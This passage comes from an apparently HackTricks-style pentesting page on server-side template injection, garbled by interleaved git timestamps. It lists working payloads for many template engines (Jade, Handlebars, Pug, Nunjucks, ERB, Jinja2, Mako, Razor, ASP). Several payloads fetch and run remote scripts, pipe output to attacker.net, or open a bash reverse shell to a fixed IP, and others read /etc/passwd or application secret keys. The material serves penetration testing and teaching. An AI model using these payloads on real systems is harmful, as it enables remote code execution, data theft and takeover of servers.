// Render a template
echo $templates->render('profile', ['name' => 'Jonathan']);
```
2024-02-06 14:12:47 +00:00
Page template:
2023-03-28 17:50:22 +00:00
```php
<?php $this->layout('template', ['title' => 'User Profile']) ?>
< h1 > User Profile< / h1 >
< p > Hello, <?=$this->e($name)?> < / p >
```
2024-02-06 14:12:47 +00:00
Layout template:
2023-03-28 17:50:22 +00:00
```html
< html >
< head >
< title > <?=$this->e($title)?> < / title >
< / head >
< body >
<?=$this->section('content')?>
< / body >
< / html >
```
2024-02-06 14:12:47 +00:00
**More information**
2024-02-23 15:34:31 +00:00
2024-02-06 14:12:47 +00:00
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#plates ](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#plates )
2023-03-28 17:50:22 +00:00
### PHPlib and HTML\_Template\_PHPLIB (PHP)
[HTML\_Template\_PHPLIB ](https://github.com/pear/HTML\_Template\_PHPLIB ) is the same as PHPlib but ported to Pear.
`authors.tpl`
```html
< html >
< head > < title > {PAGE_TITLE}< / title > < / head >
< body >
< table >
< caption > Authors< / caption >
< thead >
< tr > < th > Name< / th > < th > Email< / th > < / tr >
< / thead >
< tfoot >
< tr > < td colspan = "2" > {NUM_AUTHORS}< / td > < / tr >
< / tfoot >
< tbody >
<!-- BEGIN authorline -->
< tr > < td > {AUTHOR_NAME}< / td > < td > {AUTHOR_EMAIL}< / td > < / tr >
<!-- END authorline -->
< / tbody >
< / table >
< / body >
< / html >
```
`authors.php`
```php
< ?php
//we want to display this author list
$authors = array(
'Christian Weiske' => 'cweiske@php.net',
'Bjoern Schotte' => 'schotte@mayflower.de'
);
require_once 'HTML/Template/PHPLIB.php';
//create template object
$t =& new HTML_Template_PHPLIB(dirname(__FILE__), 'keep');
//load file
$t->setFile('authors', 'authors.tpl');
//set block
$t->setBlock('authors', 'authorline', 'authorline_ref');
//set some variables
$t->setVar('NUM_AUTHORS', count($authors));
$t->setVar('PAGE_TITLE', 'Code authors as of ' . date('Y-m-d'));
//display the authors
foreach ($authors as $name => $email) {
$t->setVar('AUTHOR_NAME', $name);
$t->setVar('AUTHOR_EMAIL', $email);
$t->parse('authorline_ref', 'authorline', true);
}
//finish and echo
echo $t->finish($t->parse('OUT', 'authors'));
?>
```
2024-02-06 14:12:47 +00:00
**More information**
2024-02-23 15:34:31 +00:00
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#phplib-and-html\_template\_phplib ](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#phplib-and-html\_template\_phplib )
2024-02-06 14:12:47 +00:00
2022-05-01 13:25:53 +00:00
### Jade (NodeJS)
2020-07-15 15:43:14 +00:00
2021-06-25 12:34:30 +00:00
```javascript
- var x = root.process
- x = x.mainModule.require
- x = x('child_process')
= x.exec('id | nc attacker.net 80')
```
```javascript
#{root.process.mainModule.require('child_process').spawnSync('cat', ['/etc/passwd']).stdout}
```
2022-04-28 23:27:22 +00:00
**More information**
2020-07-15 15:43:14 +00:00
* In Jade section of [https://portswigger.net/research/server-side-template-injection ](https://portswigger.net/research/server-side-template-injection )
2021-10-18 11:21:18 +00:00
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jade--codepen ](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jade--codepen )
2020-07-15 15:43:14 +00:00
2023-03-28 17:50:22 +00:00
### patTemplate (PHP)
> [patTemplate](https://github.com/wernerwa/pat-template) non-compiling PHP templating engine, that uses XML tags to divide a document into different parts
```xml
< patTemplate:tmpl name = "page" >
This is the main page.
< patTemplate:tmpl name = "foo" >
It contains another template.
< / patTemplate:tmpl >
< patTemplate:tmpl name = "hello" >
Hello {NAME}.< br / >
< / patTemplate:tmpl >
< / patTemplate:tmpl >
```
2024-02-06 14:12:47 +00:00
**More information**
2024-02-23 15:34:31 +00:00
2024-02-06 14:12:47 +00:00
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#pattemplate ](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#pattemplate )
2022-05-01 13:25:53 +00:00
### Handlebars (NodeJS)
2020-07-15 15:43:14 +00:00
2021-10-18 11:21:18 +00:00
Path Traversal (more info [here ](https://blog.shoebpatel.com/2021/01/23/The-Secret-Parameter-LFR-and-Potential-RCE-in-NodeJS-Apps/ )).
2021-02-03 09:46:19 +00:00
```bash
curl -X 'POST' -H 'Content-Type: application/json' --data-binary $'{\"profile\":{"layout\": \"./../routes/index.js\"}}' 'http://ctf.shoebpatel.com:9090/'
```
2021-10-18 11:21:18 +00:00
* \= Error
2020-07-15 15:43:14 +00:00
* ${7\*7} = ${7\*7}
2021-09-12 10:36:22 +00:00
* Nothing
2020-07-15 15:43:14 +00:00
2021-06-25 12:34:30 +00:00
```java
{{#with "s" as |string|}}
2020-07-15 15:43:14 +00:00
{{#with "e"}}
{{#with split as |conslist|}}
{{this.pop}}
{{this.push (lookup string.sub "constructor")}}
{{this.pop}}
{{#with string.split as |codelist|}}
{{this.pop}}
{{this.push "return require('child_process').exec('whoami');"}}
{{this.pop}}
{{#each conslist}}
{{#with (string.sub.apply 0 codelist)}}
{{this}}
{{/with}}
{{/each}}
{{/with}}
{{/with}}
{{/with}}
{{/with}}
URLencoded:
2023-07-11 13:23:18 +00:00
%7B%7B%23with%20%22s%22%20as%20%7Cstring%7C%7D%7D%0D%0A%20%20%7B%7B%23with%20%22e%22%7D%7D%0D%0A%20%20%20%20%7B%7B%23with%20split%20as%20%7Cconslist%7C%7D%7D%0D%0A%20%20%20%20%20%20%7B%7Bthis%2Epop%7D%7D%0D%0A%20%20%20%20%20%20%7B%7Bthis%2Epush%20%28lookup%20string%2Esub%20%22constructor%22%29%7D%7D%0D%0A%20%20%20%20%20%20%7B%7Bthis%2Epop%7D%7D%0D%0A%20%20%20%20%20%20%7B%7B%23with%20string%2Esplit%20as%20%7Ccodelist%7C%7D%7D%0D%0A%20%20%20%20%20%20%20%20%7B%7Bthis%2Epop%7D%7D%0D%0A%20%20%20%20%20%20%20%20%7B%7Bthis%2Epush%20%22return%20require%28%27child%5Fprocess%27%29%2Eexec%28%27whoami%27%29%3B%22%7D%7D%0D%0A%20%20%20%20%20%20%20%20%7B%7Bthis%2Epop%7D%7D%0D%0A%20%20%20%20%20%20%20%20%7B%7B%23each%20conslist%7D%7D%0D%0A%20%20%20%20%20%20%20%20%20%20%7B%7B%23with%20%28string%2Esub%2Eapply%200%20codelist%29%7D%7D%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%7B%7Bthis%7D%7D%0D%0A%20%20%20%20%20%20%20%20%20%20%7B%7B%2Fwith%7D%7D%0D%0A%20%20%20%20%20%20%20%20%7B%7B%2Feach%7D%7D%0D%0A%20%20%20%20%20%20%7B%7B%2Fwith%7D%7D%0D%0A%20%20%20%20%7B%7B%2Fwith%7D%7D%0D%0A%20%20%7B%7B%2Fwith%7D%7D%0D%0A%7B%7B%2Fwith%7D%7D
2020-07-15 15:43:14 +00:00
```
2022-04-28 23:27:22 +00:00
**More information**
2020-07-15 15:43:14 +00:00
* [http://mahmoudsec.blogspot.com/2019/04/handlebars-template-injection-and-rce.html ](http://mahmoudsec.blogspot.com/2019/04/handlebars-template-injection-and-rce.html )
2022-05-01 13:25:53 +00:00
### JsRender (NodeJS)
2020-12-01 16:50:24 +00:00
2021-10-18 11:21:18 +00:00
| **Template** | **Description** |
| ------------ | --------------------------------------- |
| | Evaluate and render output |
| | Evaluate and render HTML encoded output |
| | Comment |
| and | Allow code (disabled by default) |
2020-12-01 16:50:24 +00:00
2021-10-18 11:21:18 +00:00
* \= 49
2020-12-01 16:50:24 +00:00
2022-04-28 23:27:22 +00:00
**Client Side**
2020-12-01 16:50:24 +00:00
2021-06-25 12:34:30 +00:00
```python
2020-12-01 16:50:24 +00:00
{{:%22test%22.toString.constructor.call({},%22alert(%27xss%27)%22)()}}
```
2022-04-28 23:27:22 +00:00
**Server Side**
2020-12-01 16:50:24 +00:00
```bash
{{:"pwnd".toString.constructor.call({},"return global.process.mainModule.constructor._load('child_process').execSync('cat /etc/passwd').toString()")()}}
```
2022-04-28 23:27:22 +00:00
**More information**
2020-12-01 16:50:24 +00:00
* [https://appcheck-ng.com/template-injection-jsrender-jsviews/ ](https://appcheck-ng.com/template-injection-jsrender-jsviews/ )
2022-05-01 13:25:53 +00:00
### PugJs (NodeJS)
2021-01-09 10:15:51 +00:00
2021-01-10 15:09:49 +00:00
* `#{7*7} = 49`
* `#{function(){localLoad=global.process.mainModule.constructor._load;sh=localLoad("child_process").exec('touch /tmp/pwned.txt')}()}`
2021-12-16 22:42:47 +00:00
* `#{function(){localLoad=global.process.mainModule.constructor._load;sh=localLoad("child_process").exec('curl 10.10.14.3:8001/s.sh | bash')}()}`
2021-01-10 15:09:49 +00:00
2022-04-28 23:27:22 +00:00
**Example server side render**
2021-01-10 15:09:49 +00:00
2021-06-25 12:34:30 +00:00
```javascript
2021-01-10 15:09:49 +00:00
var pugjs = require('pug');
home = pugjs.render(injected_page)
```
2021-01-09 10:15:51 +00:00
2022-04-28 23:27:22 +00:00
**More information**
2021-01-09 10:15:51 +00:00
* [https://licenciaparahackear.github.io/en/posts/bypassing-a-restrictive-js-sandbox/ ](https://licenciaparahackear.github.io/en/posts/bypassing-a-restrictive-js-sandbox/ )
2022-05-01 13:25:53 +00:00
### NUNJUCKS (NodeJS) <a href="#nunjucks" id="nunjucks"></a>
2022-02-01 22:03:45 +00:00
2022-02-09 16:22:44 +00:00
* \{{7\*7\}} = 49
* \{{foo\}} = No output
2022-02-01 22:03:45 +00:00
* \#{7\*7} = #{7\*7}
2022-02-09 16:22:44 +00:00
* \{{console.log(1)\}} = Error
2022-02-01 22:03:45 +00:00
```javascript
{{range.constructor("return global.process.mainModule.require('child_process').execSync('tail /etc/passwd')")()}}
{{range.constructor("return global.process.mainModule.require('child_process').execSync('bash -c \"bash -i >& /dev/tcp/10.10.14.11/6767 0>& 1\"')")()}}
```
2022-04-28 23:27:22 +00:00
**More information**
2022-02-01 22:03:45 +00:00
* [http://disse.cting.org/2016/08/02/2016-08-02-sandbox-break-out-nunjucks-template-engine ](http://disse.cting.org/2016/08/02/2016-08-02-sandbox-break-out-nunjucks-template-engine )
2022-05-01 13:25:53 +00:00
### ERB (Ruby)
2020-07-15 15:43:14 +00:00
* `{{7*7}} = {{7*7}}`
* `${7*7} = ${7*7}`
* `<%= 7*7 %> = 49`
* `<%= foobar %> = Error`
2021-06-25 12:34:30 +00:00
```python
< %= system("whoami") %> #Execute code
< %= Dir.entries('/') %> #List folder
< %= File.open('/etc/passwd').read %> #Read file
< %= system('cat /etc/passwd') %>
< %= `ls /` %>
< %= IO.popen('ls /').readlines() %>
< % require 'open3' %>< % @a ,@b,@c,@d=Open3.popen3('whoami') %>< %= @b .readline()%>
< % require 'open4' %>< % @a ,@b,@c,@d=Open4.popen4('whoami') %>< %= @c .readline()%>
```
2022-04-28 23:27:22 +00:00
**More information**
2021-06-25 12:34:30 +00:00
2021-10-18 11:21:18 +00:00
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#ruby ](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#ruby )
2021-06-25 12:34:30 +00:00
2022-05-01 13:25:53 +00:00
### Slim (Ruby)
2021-06-25 12:34:30 +00:00
* `{ 7 * 7 }`
2021-10-18 11:21:18 +00:00
```
2021-06-25 12:34:30 +00:00
{ %x|env| }
2020-07-15 15:43:14 +00:00
```
2022-04-28 23:27:22 +00:00
**More information**
2020-07-15 15:43:14 +00:00
2021-10-18 11:21:18 +00:00
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#ruby ](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#ruby )
2020-07-15 15:43:14 +00:00
2022-05-01 13:25:53 +00:00
### Python
2021-06-25 16:27:28 +00:00
Check out the following page to learn tricks about **arbitrary command execution bypassing sandboxes** in python:
2022-05-16 08:29:00 +00:00
{% content-ref url="../../generic-methodologies-and-resources/python/bypass-python-sandboxes/" %}
[bypass-python-sandboxes ](../../generic-methodologies-and-resources/python/bypass-python-sandboxes/ )
2021-10-18 11:21:18 +00:00
{% endcontent-ref %}
2021-06-25 16:27:28 +00:00
2022-05-01 13:25:53 +00:00
### Tornado (Python)
2020-07-15 15:43:14 +00:00
* `{{7*7}} = 49`
* `${7*7} = ${7*7}`
* `{{foobar}} = Error`
* `{{7*'7'}} = 7777777`
2021-06-25 12:34:30 +00:00
```python
2022-02-09 16:22:44 +00:00
{% raw %}
2020-07-15 15:43:14 +00:00
{% import foobar %} = Error
2022-02-09 16:22:44 +00:00
{% import os %}
2022-09-26 09:52:47 +00:00
2022-10-03 13:43:01 +00:00
{% import os %}
2022-12-09 14:47:58 +00:00
{% endraw %}
2023-01-13 17:40:30 +00:00
2023-03-05 22:20:47 +00:00
2023-04-05 23:11:20 +00:00
2024-02-23 15:34:31 +00:00
2022-12-09 14:47:58 +00:00
{{os.system('whoami')}}
2022-04-06 08:57:29 +00:00
{{os.system('whoami')}}
2020-07-15 15:43:14 +00:00
```
2022-04-28 23:27:22 +00:00
**More information**
2024-02-23 15:34:31 +00:00
2024-02-06 14:12:47 +00:00
* [https://ajinabraham.com/blog/server-side-template-injection-in-tornado ](https://ajinabraham.com/blog/server-side-template-injection-in-tornado )
2020-07-15 15:43:14 +00:00
2022-05-01 13:25:53 +00:00
### Jinja2 (Python)
2021-06-25 12:34:30 +00:00
2021-10-18 11:21:18 +00:00
[Official website ](http://jinja.pocoo.org )
2020-07-15 15:43:14 +00:00
2021-06-25 12:34:30 +00:00
> Jinja2 is a full featured template engine for Python. It has full unicode support, an optional integrated sandboxed execution environment, widely used and BSD licensed.
2020-07-15 15:43:14 +00:00
* `{{7*7}} = Error`
* `${7*7} = ${7*7}`
* `{{foobar}} Nothing`
2021-06-25 12:34:30 +00:00
* `{{4*4}}[[5*5]]`
* `{{7*'7'}} = 7777777`
* `{{config}}`
* `{{config.items()}}`
* `{{settings.SECRET_KEY}}`
* `{{settings}}`
2022-04-06 08:57:29 +00:00
* `<div data-gb-custom-block data-tag="debug"></div>`
2020-07-15 15:43:14 +00:00
2021-06-25 12:34:30 +00:00
```python
2022-02-09 16:22:44 +00:00
{% raw %}
2020-07-15 15:43:14 +00:00
{% debug %}
2022-02-09 16:22:44 +00:00
{% endraw %}
2022-06-18 20:54:28 +00:00
2023-04-05 23:11:20 +00:00
2023-04-30 21:23:47 +00:00
2024-02-23 15:34:31 +00:00
2020-07-15 15:43:14 +00:00
{{settings.SECRET_KEY}}
2021-06-25 12:34:30 +00:00
{{4*4}}[[5*5]]
{{7*'7'}} would result in 7777777
```
2022-04-28 23:27:22 +00:00
**Jinja2 - Template format**
2021-06-25 12:34:30 +00:00
```python
2022-02-09 16:22:44 +00:00
{% raw %}
2021-06-25 12:34:30 +00:00
{% extends "layout.html" %}
{% block body %}
< ul >
{% for user in users %}
< li > < a href = "{{ user.url }}" > {{ user.username }}< / a > < / li >
{% endfor %}
< / ul >
{% endblock %}
2022-02-09 16:22:44 +00:00
{% endraw %}
2023-04-05 23:11:20 +00:00
2023-03-28 17:50:22 +00:00
```
2022-09-09 11:57:02 +00:00
2023-04-05 15:16:57 +00:00
[**RCE not dependant from** ](https://podalirius.net/en/articles/python-vulnerabilities-code-execution-in-jinja-templates/ ) `__builtins__` :
2022-12-09 14:47:58 +00:00
2023-03-28 17:50:22 +00:00
```python
{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read() }}
{{ self._TemplateReference__context.joiner.__init__.__globals__.os.popen('id').read() }}
{{ self._TemplateReference__context.namespace.__init__.__globals__.os.popen('id').read() }}
# Or in the shotest versions:
{{ cycler.__init__.__globals__.os.popen('id').read() }}
{{ joiner.__init__.__globals__.os.popen('id').read() }}
{{ namespace.__init__.__globals__.os.popen('id').read() }}
2021-06-25 12:34:30 +00:00
```
2022-07-20 01:03:41 +00:00
**More details about how to abuse Jinja**:
2021-06-25 12:34:30 +00:00
2022-07-20 01:03:41 +00:00
{% content-ref url="jinja2-ssti.md" %}
[jinja2-ssti.md ](jinja2-ssti.md )
{% endcontent-ref %}
2021-06-07 09:30:58 +00:00
2024-02-06 14:12:47 +00:00
Other payloads in [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jinja2 ](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jinja2 )
2022-05-01 13:25:53 +00:00
### Mako (Python)
2021-06-07 09:30:58 +00:00
2021-06-25 12:34:30 +00:00
```python
2021-06-07 09:30:58 +00:00
< %
import os
x=os.popen('id').read()
%>
${x}
```
2020-07-15 15:43:14 +00:00
2024-02-06 14:12:47 +00:00
**More information**
2024-02-23 15:34:31 +00:00
2024-02-06 14:12:47 +00:00
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#mako ](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#mako )
2022-05-01 13:25:53 +00:00
### Razor (.Net)
2020-07-19 21:53:59 +00:00
2022-01-06 11:03:56 +00:00
* `@(2+2) <= Success`
* `@() <= Success`
* `@("{{code}}") <= Success`
* `@ <=Success`
* `@{} <= ERROR!`
* `@{ <= ERRROR!`
2020-07-19 21:53:59 +00:00
* `@(1+2)`
2022-01-06 11:03:56 +00:00
* `@( //C#Code )`
* `@System.Diagnostics.Process.Start("cmd.exe","/c echo RCE > C:/Windows/Tasks/test.txt");`
2024-02-23 15:34:31 +00:00
* `@System.Diagnostics.Process.Start("cmd.exe","/c powershell.exe -enc IABpAHcAcgAgAC0AdQByAGkAIABoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgAyAC4AMQAxADEALwB0AGUAcwB0AG0AZQB0ADYANAAuAGUAeABlACAALQBPAHUAdABGAGkAbABlACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAYQBzAGsAcwBcAHQAZQBzAHQAbQBlAHQANgA0AC4AZQB4AGUAOwAgAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGEAcwBrAHMAXAB0AGUAcwB0AG0AZQB0ADYANAAuAGUAeABlAA==");`
2020-07-19 21:53:59 +00:00
2024-02-06 14:12:47 +00:00
The .NET `System.Diagnostics.Process.Start` method can be used to start any process on the server and thus create a webshell. You can find a vulnerable webapp example in [https://github.com/cnotin/RazorVulnerableApp ](https://github.com/cnotin/RazorVulnerableApp )
2020-07-19 21:53:59 +00:00
**More information**
2021-10-18 11:21:18 +00:00
* [https://clement.notin.org/blog/2020/04/15/Server-Side-Template-Injection-(SSTI)-in-ASP.NET-Razor/ ](https://clement.notin.org/blog/2020/04/15/Server-Side-Template-Injection-\(SSTI\ )-in-ASP.NET-Razor/)
2022-01-06 11:03:56 +00:00
* [https://www.schtech.co.uk/razor-pages-ssti-rce/ ](https://www.schtech.co.uk/razor-pages-ssti-rce/ )
2020-07-19 21:53:59 +00:00
2022-05-01 13:25:53 +00:00
### ASP
2022-02-03 15:39:58 +00:00
* `<%= 7*7 %>` = 49
* `<%= "foo" %>` = foo
* `<%= foo %>` = Nothing
* `<%= response.write(date()) %>` = \<Date>
2024-02-06 14:12:47 +00:00
```xml
2022-02-03 15:39:58 +00:00
< %= CreateObject("Wscript.Shell").exec("powershell IEX(New-Object Net.WebClient).downloadString('http://10.10.14.11:8000/shell.ps1')").StdOut.ReadAll() %>
```
2022-04-28 23:27:22 +00:00
**More Information**
2022-02-03 15:39:58 +00:00
* [https://www.w3schools.com/asp/asp\_examples.asp ](https://www.w3schools.com/asp/asp\_examples.asp )
2022-05-01 13:25:53 +00:00
### Mojolicious (Perl)
2020-07-26 18:06:17 +00:00
Even if it's perl it uses tags like ERB in Ruby.
* `<%= 7*7 %> = 49`
* `<%= foobar %> = Error`
2021-10-18 11:21:18 +00:00
```
2020-07-26 18:06:17 +00:00
< %= perl code %>
< % perl code %>
```
2022-05-01 13:25:53 +00:00
### SSTI in GO
2021-05-27 10:20:50 +00:00
2024-02-06 14:12:47 +00:00
In Go's template engine, confirmation of its usage can be done with specific payloads:
2021-05-27 10:20:50 +00:00
2024-02-06 14:12:47 +00:00
* `{{ . }}` : Reveals the data structure input. For instance, if an object with a `Password` attribute is passed, `{{ .Password }}` could expose it.
* `{{printf "%s" "ssti" }}` : Expected to display the string "ssti".
* `{{html "ssti"}}` , `{{js "ssti"}}` : These payloads should return "ssti" without appending "html" or "js". Further directives can be explored in the Go documentation [here ](https://golang.org/pkg/text/template ).
2021-05-27 10:20:50 +00:00
2024-02-06 14:12:47 +00:00
**XSS Exploitation**
2022-02-03 00:17:18 +00:00
2024-02-23 15:34:31 +00:00
With the `text/template` package, XSS can be straightforward by inserting the payload directly. Contrastingly, the `html/template` package encodes the response to prevent this (e.g., `{{"<script>alert(1)</script>"}}` results in `<script>alert(1)</script>` ). Nonetheless, template definition and invocation in Go can bypass this encoding: \{{define "T1"\}}alert(1)\{{end\}} \{{template "T1"\}}
2022-02-03 00:17:18 +00:00
2024-02-23 15:34:31 +00:00
vbnet Copy code
2022-02-03 00:17:18 +00:00
2022-04-28 23:27:22 +00:00
**RCE Exploitation**
2022-02-03 00:17:18 +00:00
2024-02-06 14:12:47 +00:00
RCE exploitation differs significantly between `html/template` and `text/template` . The `text/template` module allows calling any public function directly (using the “call” value), which is not permitted in `html/template` . Documentation for these modules is available [here for html/template ](https://golang.org/pkg/html/template/ ) and [here for text/template ](https://golang.org/pkg/text/template/ ).
2022-02-03 00:17:18 +00:00
2024-02-06 14:12:47 +00:00
For RCE via SSTI in Go, object methods can be invoked. For example, if the provided object has a `System` method executing commands, it can be exploited like `{{ .System "ls" }}` . Accessing the source code is usually necessary to exploit this, as in the given example:
2022-02-03 00:17:18 +00:00
```go
func (p Person) Secret (test string) string {
out, _ := exec.Command(test).CombinedOutput()
return string(out)
}
```
2022-04-28 23:27:22 +00:00
**More information**
2022-02-03 00:17:18 +00:00
* [https://blog.takemyhand.xyz/2020/05/ssti-breaking-gos-template-engine-to.html ](https://blog.takemyhand.xyz/2020/05/ssti-breaking-gos-template-engine-to.html )
* [https://www.onsecurity.io/blog/go-ssti-method-research/ ](https://www.onsecurity.io/blog/go-ssti-method-research/ )
2021-05-27 10:20:50 +00:00
2022-05-01 13:25:53 +00:00
### More Exploits
2021-06-25 12:34:30 +00:00
Check the rest of [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection ](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection ) for more exploits. Also you can find interesting tags information in [https://github.com/DiogoMRSilva/websitesVulnerableToSSTI ](https://github.com/DiogoMRSilva/websitesVulnerableToSSTI )
2022-05-01 13:25:53 +00:00
## BlackHat PDF
2020-07-15 15:43:14 +00:00
2022-10-25 15:56:49 +00:00
{% file src="../../.gitbook/assets/en-server-side-template-injection-rce-for-the-modern-web-app-blackhat-15.pdf" %}
2020-07-15 15:43:14 +00:00
2022-05-01 13:25:53 +00:00
## Related Help
2020-07-15 15:43:14 +00:00
If you think it could be useful, read:
2022-05-01 13:25:53 +00:00
* [Flask tricks ](../../network-services-pentesting/pentesting-web/flask.md )
2022-06-18 20:54:28 +00:00
* [Python magic functions ](broken-reference/ )
2020-07-15 15:43:14 +00:00
2022-05-01 13:25:53 +00:00
## Tools
2020-07-15 15:43:14 +00:00
2024-02-06 14:12:47 +00:00
* [https://github.com/Hackmanit/TInjA ](https://github.com/Hackmanit/TInjA )
* [https://github.com/vladko312/sstimap ](https://github.com/vladko312/sstimap )
* [https://github.com/epinna/tplmap ](https://github.com/epinna/tplmap )
* [https://github.com/Hackmanit/template-injection-table ](https://github.com/Hackmanit/template-injection-table )
2021-06-27 21:56:13 +00:00
2022-05-01 13:25:53 +00:00
## Brute-Force Detection List
2021-06-27 21:56:13 +00:00
2021-10-18 11:21:18 +00:00
{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssti.txt" %}
2020-07-15 15:43:14 +00:00
2022-05-01 13:25:53 +00:00
## Practice & References
2020-07-15 15:43:14 +00:00
* [https://portswigger.net/web-security/server-side-template-injection/exploiting ](https://portswigger.net/web-security/server-side-template-injection/exploiting )
* [https://github.com/DiogoMRSilva/websitesVulnerableToSSTI ](https://github.com/DiogoMRSilva/websitesVulnerableToSSTI )
2024-02-06 14:12:47 +00:00
* [https://portswigger.net/web-security/server-side-template-injection ](https://portswigger.net/web-security/server-side-template-injection )
2022-04-28 16:01:33 +00:00
2022-10-25 15:56:49 +00:00
< figure > < img src = "https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt = "" > < figcaption > < / figcaption > < / figure >
[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe** . With **the mission of promoting technical knowledge** , this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.
{% embed url="https://www.rootedcon.com/" %}
2022-04-28 16:01:33 +00:00
< details >
2024-01-01 17:15:42 +00:00
< summary > < strong > Learn AWS hacking from zero to hero with< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > < / a > < strong > !< / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-01-01 17:15:42 +00:00
Other ways to support HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS** ](https://github.com/sponsors/carlospolop )!
2022-09-09 11:57:02 +00:00
* Get the [**official PEASS & HackTricks swag** ](https://peass.creator-spring.com )
2024-01-01 17:15:42 +00:00
* Discover [**The PEASS Family** ](https://opensea.io/collection/the-peass-family ), our collection of exclusive [**NFTs** ](https://opensea.io/collection/the-peass-family )
2024-02-23 15:34:31 +00:00
* **Join the** 💬 [**Discord group** ](https://discord.gg/hRep4RUj7f ) or the [**telegram group** ](https://t.me/peass ) or **follow** us on **Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/hacktricks\_live )**.**
2024-01-01 17:15:42 +00:00
* **Share your hacking tricks by submitting PRs to the** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) and [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) github repos.
2022-04-28 16:01:33 +00:00
< / details >